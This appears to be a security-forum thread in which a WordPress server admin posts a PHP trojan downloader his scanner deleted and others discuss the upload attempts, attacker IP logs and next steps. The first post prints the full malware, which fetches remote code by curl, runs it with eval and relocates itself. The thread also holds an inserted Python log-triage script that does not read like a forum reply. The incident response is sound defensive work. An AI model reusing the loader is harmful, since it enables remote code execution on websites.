
Malicious file PHP/TrojanDownloader.Agent.CZ was detected


Posted (edited)

Real time scanner on my Ubuntu 22.04 server that's used just to host wordpress sites found and deleted this bad boy


Contents of the file are as follows:

<?php
error_reporting(0);

// Target directory inside the WordPress install where the script relocates itself
$HomePath = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/Text/Diff/";
define('CUSTOM_FILE_PATH', $HomePath);

$file_path = __FILE__;
$file_name = basename($file_path);

// Fetch remote content and execute it as PHP (URL defanged as posted)
$ch = curl_init('hxxp://ndot.us/za');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
eval('?>' . $result);

// Move this file into wp-includes/Text/Diff/ under its own name
$customFilePath = CUSTOM_FILE_PATH . $file_name;
rename(__FILE__, $customFilePath);
?>

 

I've checked all sites' /wp-includes/Text/Diff directories and there are no new modified files/folders in any of them.

What would be my next steps?

Thanks in advance


Edited by FTL
Posted

Chromium based browsers just show the code on the page in plain text

Firefox shows the page formatted

I can't see anything happening when I hit the page

I have blocked outbound access to ndot.us now but just wondering if and what anything has already happened?

Posted (edited)
2 hours ago, FTL said:

Firefox shows the page formatted

My FF 118.0.2 showed code in plain text format. Note the modification author even stated who he is. Since this person has multiple scripts posted at Github, I assume this is where it originated from.

[Screenshots PHP_1, PHP_2, PHP_3: the modified plug-in source]

Edited by itman
Posted

Eset now finally blocking the domain;

[Screenshot: ESET blocked-domain notification]

Also of interest is this domain won't scan at Sucuri. It displays the web site doesn't contain any data - go figure.

Posted

Yes you did :) I also found it.

URLSCAN.IO shows multiple scans for this domain with different Webshells hosted on it.

@FTL

We also got this detection, but it's OK because at least for us, the webserver returned 404 or 500 when the POST request was made (we do not host wordpress at all). So basically this is an automated script that tries to exploit some wordpress vulnerability and, if successful, curl downloads the webshell.

Example:

95.214.27.5 - - [23/Oct/2023:05:39:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 1713 "-" mjdomain.com "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" APACHELOG

And yes, detection occurred on: file:///tmp/phpMjc32fg  which is normal, because PHP processed this POST request.

So in my opinion nothing happened with your server, but check where that post request was made and make sure WP and plugins are up to date.

Posted
8 hours ago, Gregecslo said:

Yes you did :) I also found it.

The Github link I posted was to the original WP plug-in.

My above posted screen shots show that this plug-in was modified by someone named Mr. 7Mind. This same individual also has numerous other scripts posted at Github including reverse shell backdoors.

So it appears this hack was very much "an off-the-shelf" one. The question is where was the modified WP plug-in acquired from?

Posted

This I don't know.

For me, detection came from this:

95.214.27.5 - - [23/Oct/2023:05:39:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 1713 "-" mjdomain.com "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" APACHELOG

And it seems that exploited vuln is: https://support.alertlogic.com/hc/en-us/articles/115005740363-Metasploit-WordPress-Ajax-Load-More-Arbitrary-File-Upload

Again, I have NO wordpress site installed (but ESET did detect it anyways in PHP TEMP which IS NORMAL), server returns 404 or 500....

That's why I said that OP should check POST requests on server...

Posted

So this file has now been created 4 times and RTS has deleted it each time

All on different sites - but they are all up to date for both Wordpress and all plugins

Server is up to date too

Same pesky IP as well, so that's blocked now, but not the answer I know

Site 1

95.214.27.5 - - [21/Oct/2023:18:32:22 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

Site 2

95.214.27.5 - - [22/Oct/2023:16:25:54 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

Site 3

95.214.27.5 - - [24/Oct/2023:22:26:34 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

Site 4

95.214.27.5 - - [26/Oct/2023:08:18:28 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"

 

How is this PITA managing to continually drop malicious PHP files onto the tmp folder on server?

In Depth scan of the server is clean
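As an added example (not code from the thread or from ESET), here is a small triage script that parses the access log lines quoted above, groups POSTs to admin-ajax.php by source IP, and reports which IPs ever got a 2xx response, since an accepted upload is what would warrant inspecting the site rather than just the PHP temp folder. The log lines are the ones posted in this thread plus one constructed benign request; the regex and function names are my own.

```python
import re
from collections import defaultdict

# Matches the combined-style access log lines quoted in the thread (regex constructed here).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample: three lines posted in the thread plus one benign GET from another client.
SAMPLE_LOG = """\
95.214.27.5 - - [21/Oct/2023:18:32:22 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
203.0.113.9 - - [21/Oct/2023:18:40:01 +0100] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
95.214.27.5 - - [23/Oct/2023:05:39:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 1713 "-" mjdomain.com "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" APACHELOG
95.214.27.5 - - [26/Oct/2023:08:18:28 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0"
"""

def parse_line(line):
    """Return the parsed fields of one access log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def triage_admin_ajax_posts(log_text):
    """Group POSTs to /wp-admin/admin-ajax.php by client IP with count, statuses and time span."""
    hits = defaultdict(lambda: {"count": 0, "statuses": set(), "first": None, "last": None})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        if not rec["path"].startswith("/wp-admin/admin-ajax.php"):
            continue
        h = hits[rec["ip"]]
        h["count"] += 1
        h["statuses"].add(int(rec["status"]))
        h["first"] = h["first"] or rec["ts"]
        h["last"] = rec["ts"]
    return dict(hits)

def needs_followup(summary):
    """IPs whose POSTs ever received a 2xx: the upload may have been accepted, so inspect the site."""
    return sorted(ip for ip, h in summary.items() if any(200 <= s < 300 for s in h["statuses"]))

if __name__ == "__main__":
    summary = triage_admin_ajax_posts(SAMPLE_LOG)
    for ip, h in summary.items():
        print(ip, h["count"], sorted(h["statuses"]), h["first"], "->", h["last"])
    print("follow up:", needs_followup(summary))  # prints "follow up: []" for the sample
```

Run it against the real nginx access log by reading the file into triage_admin_ajax_posts; only 4xx/5xx responses, as in the lines above, mean the upload attempt was rejected before PHP could keep the file.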

Posted

Hi Marcos

I use Nginx rather than Apache, both are on the latest stable versions I believe

nginx version: nginx/1.24.0

PHP 8.2.11 (cli) (built: Oct  6 2023 09:47:18) (NTS)

  • Administrators
Posted

I would then contact a security company that audits websites.

Posted (edited)
Quote

And yes, detection occurred on: file:///tmp/phpMjc32fg  which is normal, because PHP processed this POST request.

Again, I have NO wordpress site installed (but ESET did detect it anyways in PHP TEMP which IS NORMAL), server returns 404 or 500....

If somebody does POST request with malicious file inside POST request PHP will process it (execution is done in PHP TMP folder) and that is where detection comes from.

This also happens to me on server where nothing is installed but apache + php...

Deleted ESET, SAME post request came, no files were dropped (but file was naturally in PHP).

Problem would be if you find XXXX.php file which was dropped in webserver folder...

Edited by Gregecslo